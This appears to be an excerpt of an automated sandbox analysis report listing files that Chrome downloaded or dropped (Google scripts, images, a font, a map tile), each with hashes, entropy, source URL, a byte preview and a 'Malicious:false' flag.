                                                                                                                                                                                                                                                                                          SSDEEP:6:Xt6kjw2PnuApcGcl36JXE5WZn8maypXobhUMa7v5alHLIowpR7/:Xhj+GWiXEsZNpXfMk5alrIb7/
                                                                                                                                                                                                                                                                                          MD5:4FA8A8B72D3E10ECEB47A923EFACAAAF
                                                                                                                                                                                                                                                                                          SHA1:77F48C99C0CFDC1E041C53D0403674DB79C534D3
                                                                                                                                                                                                                                                                                          SHA-256:5183D2D6B03B485636ADF2C9C0FE4B27E1B1AF902834FDB0C88ECE1FD79FDF63
                                                                                                                                                                                                                                                                                          SHA-512:D3AD195434244A4E6AE511ED0BBA3BEECE49D5C5C2BD24FF0014B72A7B668923368356944B07746DE57C0D229B382271DB5C71C786A32B23BDA6658DA1367BCE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........\P.n. ......\..d.*d......[US.Dm+.&...U.J...q.q.o..0&oQi.............J.A..1Z...!<..|..SZ.*.,.Q,..RR....p^?..o..~...67/....._.-^....F...H!.4....2... .X.0.V.FQ...O.d..a.7(v....2..MG.:v.MOf..J...;...._.T._P.Re..........fy".<...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3398
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.901602155910697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:qZmrYmztjK0iqidO9WONXqtmt0VQ7S+Tl44IgG6jP:qMbz5K0n9xtIW6Q7S+544IIz
                                                                                                                                                                                                                                                                                          MD5:4A47009495D78EA7CB1DCEE7FC77455B
                                                                                                                                                                                                                                                                                          SHA1:1A22741247779DC4D4A40968A972D779B781502E
                                                                                                                                                                                                                                                                                          SHA-256:2110BE636901ACC51D587F1C0DE3F371A42D8C2D287E8DE243F6F6C6DDFF8E5B
                                                                                                                                                                                                                                                                                          SHA-512:E15F242DC659CF3147671373FC360042A4B13CE949636EC1DECF27BD72F76169406F80E1367CF39121CD2980DB6FA58DEB991AB1B07E65336EB69B014F4B7ACD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{pT.....{w7.'.$.WDD.........Bj.I.L...i..U....Z....Z.U.m.#.B.Z.i.[...A.....f.}.{~.c...d.....|f2..s~....s~.u....D".H$..D".H$..D".$........-...s..y....4W.cp....X.B.....C.....C{...drW..d..........`.&..5...T..2D=......u.-W.....`$].......c._.l....H......n...'..OR....`X.A...MTH..".....]4;.)... ..G...J..t.H4.0n....x.0.7m....`.........S.*AB.n...1..L...........3#.m...].....c..i73 .z...W;.H.Wn.....0.W.;.....qkhn2.."..;i...q...{.......^Gm....Eo..S...;.3r ..q....[.......%.s..`,...$....J.H.qu..'.3)n.p.>...+.>b..]<.....0#..J..+..b..#.DUs.K.R6c.......@}.....$....S.m.!..l..e9......"...................r...p85..CEN...<...T.. DDl!.Y!..yr.6.....Y.i[xq"...U.@[G.MG:.x...<.o[.........."J.....(.aL6..*@....s.. .@..ad(*..+...]4..y'.@p.^...*....n<..x..9.89..... ....%u...pq.bz)...F.;..>p.......6...E.Te.......Z.^a.;C.`....a.......3....@.@.h.n.=.... ..B..-53...tmQ`...+.......w.~..>...j..f2..n..n..3....@...u
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1351
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.670382994909587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TUGlkOOEfDt79bJ9LiQuqFk1LfmB9jd75rMhvhiR8d02DVvovTdv1OG9RVhDnFiW:IqkOOEL19l9LiQu/1mjUiR8d0cvm31Rn
                                                                                                                                                                                                                                                                                          MD5:47AB6E6899E70DF2FB55BE6044B40DBB
                                                                                                                                                                                                                                                                                          SHA1:A0E5BED47D683A65733E1718316E58D4AF753B08
                                                                                                                                                                                                                                                                                          SHA-256:249877417315EC69CFE02B4FEAD9E1C6BC7596A83FD6F858F6693E0615F63036
                                                                                                                                                                                                                                                                                          SHA-512:98CDA4A9FD7B6ED2097A8B3F5FBBDB9BC2BDEBBAC049E382C3B74802D96B7A84129E49B9888F30A6D4DCA6C2810E0E8FE15301392A7CCC94F44EC2FFB5BB6C45
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...@...@......iq.....IDATx.....H.EG*3..=f....M....cfff.....13..sL.N..T.x.qq......{p..........Tq.....yO.v..4....}.C.....u..f*..;g.X6.G..=..Z..-sa...-....-....L...p..J.&...)..R.{..B=c^..!.S..Guo....*3W9.4...=.."x......M.z.A\..Q........QV..D.HS.?....!.x.... ....Yhm].<..Q..l..|.1#...SE8..}O..~..M.e..Q.... ,/.j.....P.f.d........3u.......=&. /.....`._iv.^}....Z..........I.Z..MY.O.....+..OZ......Z.B.G.?........!...X'l...>7.i_....K..t..i...y...Bs.......v2...L..T8.l"......+........W.....#...~...,.Jn.pl9V~..4.5.........1R}.ip...x*2..3.u._e0.Z.y..|u.f!.I.x...X....@bV,.0...w.......M.......X..+._3....YB...n...*O_.k.@Z...I..o+.........U..`.@.lk.."....`..ZOE."..E_%{.`.....L`.#f.....T4...#.....,.....b?Q..4uN..:&\C.........G.>"U.l...k2.......2.8}"m7.X.(.KD6.J_2.............v.1}....lj.b.]v7..O#.h....h........i..!{.W..&.........?.A....=..A........K..>.!.......@..97!........~_...`!..."..?..~G.`.].\s.A8...7U~..9.>...@.3....\...?.`.|.0.....j..m.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1388
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):637
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.650386954014402
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XlK5YwiLvnKD4x8ORizwU8xv6nQyxCnk0M2oE3UG2VBadRp+kChFqyNSLFMg:XlO8u4x8Ei8UOv2QyxqmmUG2VmD+kCLW
                                                                                                                                                                                                                                                                                          MD5:5B1CB0EFFDF557F357F0E43E4F8D182F
                                                                                                                                                                                                                                                                                          SHA1:E7A3327962C67C0D7C6567C664841BF74581BDCA
                                                                                                                                                                                                                                                                                          SHA-256:84F419BCCEBCE3DBA3BC0D9D5128E0F11DB06DC47782EEB1929DF5478A0D3684
                                                                                                                                                                                                                                                                                          SHA-512:B5263F70FD27611B023659EABBD2F6DCBACF2A22043911ACBB42E7A073A837C3C8EC8F131B1BDB28A63CC624FF130AECD0A61D10D36484DA93457997F1857DFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........|.Ks.0.....[.......3..f:.\.......0&.......&vt0....jW8.;<..7u.WeB8e.L....$...onD.fWq..@..6.hw ..|.Y.tg.s.~...a..G.5..A9..)..d..n=.m[.JZ..O0.<..).."/.......dv........4..V.-..... ....+....b..M.....\w....f....Kk.rU,P{..4......{..`j..l^..5)..f.&..>t..@.&..[[..4...&!eU..r.^.x.b.v{.~)0..MY..p...Gnm.....1...We.T......v.r....r..\..u3.}...M.....z...]J}b...B7.Xox..O........:.t..&.s..7}+.j/...s@.t.U:j....... ..gh.{=...g.[.......s.2..P<B.9>.....5...0g.....Hp..l.OD.:..L.9.T+.*.M..p.....(N.d.e..~...s...d.........:.m.}!....X%:.."......eET)..L_.:Oh<.`....2P_..-....{...Wu>.Y.u.>...ix....\...?...7q..7........$.)sl...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):507580
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.613219295391108
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:pG8dOE0eD+EpS4NjBPZ3vhH+p0leR7aKQCn4iE:paYNPZ3pH9AUKQniE
                                                                                                                                                                                                                                                                                          MD5:DCD7F02305FEDA68F0E33013235436AC
                                                                                                                                                                                                                                                                                          SHA1:808E063B84B2EBC684560AE344BDA5C293DD6E9F
                                                                                                                                                                                                                                                                                          SHA-256:238FBDCB7A2938C102A9AFC0DF35D0697EEF4B640A361D1A3DAFE02F85826CAA
                                                                                                                                                                                                                                                                                          SHA-512:84E7FAA2B35FF10C8F8071C12CF237E87FC29ED3BB5A4304C82ED3D4561F18B491E67F6A39391D9940305279094C4707D5D0332F94258A267674530E59A35D84
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/ck=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAIAoQHcSAACMAgA2ACAAAAAAAAQAAAMAAgQBAEQCAAACBOACACAQAAAFACISAABBE4BHmQCBESBMAAEUQAgQgAQIFEEoRAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAEAAxQACBADoIRAABgJhAgAgBPQABAAAAIAAgAJAAAEaAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/ujg=1/rs=ACT90oEgYxAnltOQ2uX96jprRQET-kPdwg/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3"
                                                                                                                                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows cursor resource - 1 icon, 32x32, 2 colors, hotspot @8x8
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):326
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.5620714588910247
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Gl/0puls6M94pTiI+mBURd8EOJlZa8BBL:C0pqs6M94pTJyOZ77
                                                                                                                                                                                                                                                                                          MD5:FEFF9159F56CB2069041D660B484EB07
                                                                                                                                                                                                                                                                                          SHA1:0D0A08CF25A258511957F357B89D3908F3C5E6E3
                                                                                                                                                                                                                                                                                          SHA-256:7342F390B12F636D14E25F698FC5E38CF6240994DC0C07FEFBBB4E78EC4D03C7
                                                                                                                                                                                                                                                                                          SHA-512:F850277F48AC14FA363265469776E6F7F07F7DD743AA1D1AD7CF2329EEE6D323DA3422CF6BAAC066C84ECD24800A02088053EF3FC0488D170E7FC942AC8FFA99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...... ......0.......(... ...@...............................................................................................................................?...w...g...............................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8166
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958002733271823
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:N51UecXdlWqFN8DCo3JHnkxLJa5kTKoLQsdPjN+GssopnH:r1uXdlWYN8+6HnULJa+TK4dPjsZsotH
                                                                                                                                                                                                                                                                                          MD5:49D3C8ADBA7ABEBAB8CDDB827EF0D6BE
                                                                                                                                                                                                                                                                                          SHA1:17223539D6A3D813F4DD018924B30F79A8DCCA50
                                                                                                                                                                                                                                                                                          SHA-256:D54ADA881901A560A369021F3D2F3D395AC36FCA18FB3E61C16E64555156F0E5
                                                                                                                                                                                                                                                                                          SHA-512:28335306B7F6738D3F87DB973E2D77DCCBB4DA4C3661394B6C880035513908C405ADD42E2780C286CB29C88BBA822DB5DF1B23CE2DDDA3FAEB08E7BE49CB8B91
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/HZ7MIzEUISdwHRUdOnlf9tGLcnTh0s147KiRQCELgTqsg5OdqUGbkZVlk_mCAEdDOboGRQDWQxZNdm_vBM7Oo8lgAaDzjM3wb-KB=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..itdWu....[.........l...L.1.!$LIX+Y/...9y..|x.b9.X...+`.y|.....p...`..#x.=..nlw.ZRKU.Ku.9.}.R.T....+..._....=.=....g....8..8..(..w..B>.O.a.n...c....1&..sN8.j.Qk.z.#..H.(x..c.l..n..#.Y.s.\......5...z.....Ed..v.-".VU.......T..L..@?...y.x>...D"....e...~.8p..|..A...vU.j..d..BU.....V.#.2.{#P.y......U.q..}........;..3}.d.*.........P.3. .ZU..:...&.Q.j.U....(....vW{{..5).2qT.<55.<33s..^h..RD.T..c..Z..d...>.E.... .?..N.k.."8..{.7.ND..N...hUQ&[.gU.>U..1.l6;..e..QQs.....{...Fk......ZPUT...>.|7.N.#.N..].u..|>...~c..@.Fl%........;;;.Z..[m.r........r..;.....A...M.......R....79..,..M...V@.0< "........|Mk.9.=>>~.1.r...2.....a..,.L....ud..]3.s..;....L&{.*...b....===..E~kBp>...1......([..........oUk|bb..(........0..-.}.s..]]].V+?....*....;...Z{..*(.v.`....C.W...B...ah...5.|..,....q.1.\......U.&&&.s.-....1g..*..F5I.....1. ......_l.x.M..O.'.1.c0.....:...&''c..X.......^..7.c..+."`.X;..@P...0....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x300, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):73286
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980802676626249
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:9CSQH54dUhYpzKVQuMG/gt+DYKs3+SZTokIBp3Xp/0YJfkgDNa:AFHaGhq0nMYDYdO+hqHdfkgDNa
                                                                                                                                                                                                                                                                                          MD5:91D24474FE6FAB3962B59F2080AE2842
                                                                                                                                                                                                                                                                                          SHA1:4C5E21E48791ADFC9BA44DB34083B2B0C14A3B1B
                                                                                                                                                                                                                                                                                          SHA-256:23975F8DB3371A25A667ADA972D884365631FE351C37A4A721E4A5D9A45E0F9C
                                                                                                                                                                                                                                                                                          SHA-512:3634DA7EB82C93AFD01BE869F67CC39E5616432B3D1F3AE453B0B4E3492FF0F9AF189365FDF70224809CCAA6689D1C197F79E72126AB19BB711694F600D93D56
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/0f/4c/630c1cac4415bce96651893e2faf/monitoring-the-planet-uncop26-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................,...."..........................................V.........................!.1A.."Qa.2q..#BR....3b...$r.......%4CScs......Dt.5ETd.....................................?........................!1..AQa"q.....2......#BR....3r.b$C...............?..V...9rX....&u.(.Y..H.Vwv<.QAf'..pI.~.u.8..SQ&...UW =.4d..v.!..N. .......=..~.....j...](.U;.jX..A..4F...n. nR.2.....@;7....j$.k.W.X...jJ.,...........(......s...s4.C.m...Q..r.N+.X..0]=..`.k.*7..~....8[4J*s%L.Y7.-..M...;s...7A.R{.>J..~.\.m...O.II....@...D...n..4...o.U....@.@...??<\.(..^..IU{wmb....I;.6?.<..D..]..F..m.Q7,..9..Xg.Z.Z>.D.n.._k....Kv..cN..t.._Jys...\..*..{.7.....YEh.D....Z..I6.u..y.[...9......YkrH..x.........i.=..&;Z;...k.]y..\.....sacg3..G.Th.$..WGSfVSb.;..l...K.....,,8...OY<T..4....(..gv..@:.H..$...M.....2t..0U..H......w=.0.0.w./.....xl.:(.k.e.y.z*....y....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 314 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):67119
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980414935902374
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:6qlLM1QUaq+A+vwfvHpf0/ccYXNEfzRijJGQas1PChj:XlLMOU9+A+vwKnHRQdR1PChj
                                                                                                                                                                                                                                                                                          MD5:C4D2236D4D9FD5652314C24B22EF37AE
                                                                                                                                                                                                                                                                                          SHA1:06794845E2BDED4F550CEFFD229EA9DE27FD990A
                                                                                                                                                                                                                                                                                          SHA-256:628CC4F4963845D41CB3913C581F3A8E0841E64A86222A94CD3B157E1DBA95D2
                                                                                                                                                                                                                                                                                          SHA-512:E5136E98219CE71DA580D06025EED5B339AA260EADC9ED58C3AD9CBD73446B72FDA78707BDEE1804892D49761CC62D47D35EBE0501E63F9272AEFC7D00A96507
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/uY0DBQik6UA-8r3u940KST-4No0y-XK9SdLkA8cirg9XMg5hw43uvY04aMt_suipYETIU-g7GYZ12T1nUvefZBSpugr9xlvkvVb9L6p5EibJwYIX2A
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:..........K......sBIT....|.d... .IDATx..y.]Gq/.[{....h.k.,K...!..........Bl .../..$.|..{.KHx!......1...C..`F.`.... .-...eIg......R..U.kK..a...o......_Uu...$.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%.PB.%..IR..f ._.j4.k..?....Lt:.J...0...rA....>. H.a...L&..v..T*.....r.~._.f.G'''w.A"....J$..0.}.^..v...z+.,M.R.A.. .aX.....a)....B....Y.. ...R.y.A.D.....0.... ....... ....A........A.4.4.4.0l.a...`6..c.^.P>.....8.3.<m...........~....7.r...Ngs... X.J.J...&.0.H.R.l6.`.l..l....s.=.C.Pr.%>...y..G.......`..L...0....J.v.Ap_..zp.M;N...w.....v..ya..g.r..a.n.... ...(.A0...D>..8 Y...8(=.]F.~t.."..}..C...Ap<..j...R..A.....{....3.<.....c.m..:.zbK./0...e.....3.l..pM..E..L..N......./..$......S..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16396, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16396
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985827035156134
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:Lha7McMVhiB+XmITjsy+wHXjov+sc8idzmAKUcLIS:Va7McSPXpjsy+wHzu+nZdKDUcLr
                                                                                                                                                                                                                                                                                          MD5:A2EDB5C7EB3C7EF98D0EB329C6FB268F
                                                                                                                                                                                                                                                                                          SHA1:5F3037DC517AFD44B644C712C5966BFE3289354C
                                                                                                                                                                                                                                                                                          SHA-256:BA191BF3B5C39A50676E4ECAE47ADFF7F404F9481890530CDBF64252FBB1A57E
                                                                                                                                                                                                                                                                                          SHA-512:CC5644CAF32302521CA5D6FD3C8CC81A6BBF0C44A56C00F0A19996610D65CF40D5BAE6446610F05A601F63DEA343A9000E76F93A0680CFBF1E4CF15A3563A62C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVnmhjtg.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......@...........?...........................<..l..:.`..:........d.....6.$..(. .....N.....5x.-.v.?..,...<Sn..O/.<.... ......{r2D!v@..?...."..F..\3...-5B....x.).x.$ze._c.l.)~Y..YE.J.e.uW.%).?..T.].q_7y.4...$....*t.F #t8.j...GO..k..&.Ecb.X..m#.........k.s.Fr...<q~.@].PHN?..w.h.f...!h..A,H......*H.R.T.R.*......)...m..}u...".)(J.......>!. .V-....E^.bQ.....U.....u.s?$3.L$...y.........LpB.H.=...."R]|=..._.o..W....N.j2.L.D.....{.<..s.W1I. zHx:..I.......G..~.6..E.&I4.J..h.Y...uM..D.z.u*..)......<...T.......U...k...O......C.!vCy....&..y......t....e...(#.......%v..;.XTS...,....A.w.....K...vv.AI..~y..t..f.....D!...h.."e...h.pQ..{...\..G.......K.[.R....{.%]].0...!i.. ....w..*....4...*`G.2...GD.wZV"...I.......tGQ.<..d..P...o.{......].hI#.....(..0_d..%....E.....?.|...)...U.*"b....1bT.....~.U.[.NJ%....h*W....s.;.Vm.}]..2............<...|q.yW.x....sar!.J. .D...z..GcH.~k.r. >..kY...$2D..B@0.5.6.:...T.xr.~. `M...;.?..b6.Puc,.P.....F.pU.a.f_.xS.....IV.r~......6"..AX.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):44
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5160276412662315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Ul/ygn1ZrFIEbpD7an:UAi1ZYn
                                                                                                                                                                                                                                                                                          MD5:4597EBF072B6E123705160FD4571A540
                                                                                                                                                                                                                                                                                          SHA1:574D9C3C77230531194DDF955F79B4E0A539E458
                                                                                                                                                                                                                                                                                          SHA-256:48860D4FE9F78C8C9D195830988CD52AB17E71C7C0E623383509F5C966A6BF5F
                                                                                                                                                                                                                                                                                          SHA-512:6E975560962FA57B35F7F8EB0B5666F6D48C97BE69080B02E87DCA7FCC3823BDB5E769652A310DEFE4EAD730145E466B42891F3D0DC248D037ACD835772931DE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i5!3i6!4i256!2m3!1e0!2sm!3i707457581!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=58123
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8L..../..?.....v....E...".....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
